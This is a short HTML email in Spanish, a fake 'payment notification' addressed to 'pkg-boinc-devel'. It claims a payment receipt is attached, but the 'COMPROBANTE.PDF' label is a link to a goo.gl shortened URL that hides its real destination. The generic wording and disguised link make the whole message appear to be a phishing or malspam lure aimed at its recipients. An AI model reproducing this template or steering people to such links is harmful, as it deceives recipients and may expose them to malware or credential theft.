<!DOCTYPE html>

<html lang="es">

<head>



  <meta charset="ISO-8859-1">



  <meta name="viewport" content="width=device-width, initial-scale=1.0">





  <title>Pago</title>

  <style>

  body {

    font-family: monospace;

    font-size: 13px;

    color: #2c3642;

    background-color: #ffffff;

    padding: 20px;

  }

  a {

    color: #0066cc;

    text-decoration: none;

  }

  </style>

</head>





<body>





<header>

  </header>

<h1>Notificación de Pago</h1>







<main>

  <section>

    </section></main>

<p>Hola <span id="usuario">pkg-boinc-devel</span>,</p>



    

<p>Adjunto encontrarás el comprobante de pago.</p>



    

<p>

      <a href="https://ja2r7.app.goo.gl/38P6hrfRuE8jV8f39" target="_blank" rel="noopener noreferrer" aria-label="Ver comprobante PDF">COMPROBANTE.PDF</a>

    </p>



    

<p>Por favor, confirma la recepción de este correo.</p>



  





<footer>

  </footer>

<p>Saludos!!!</p>







</body>

</html>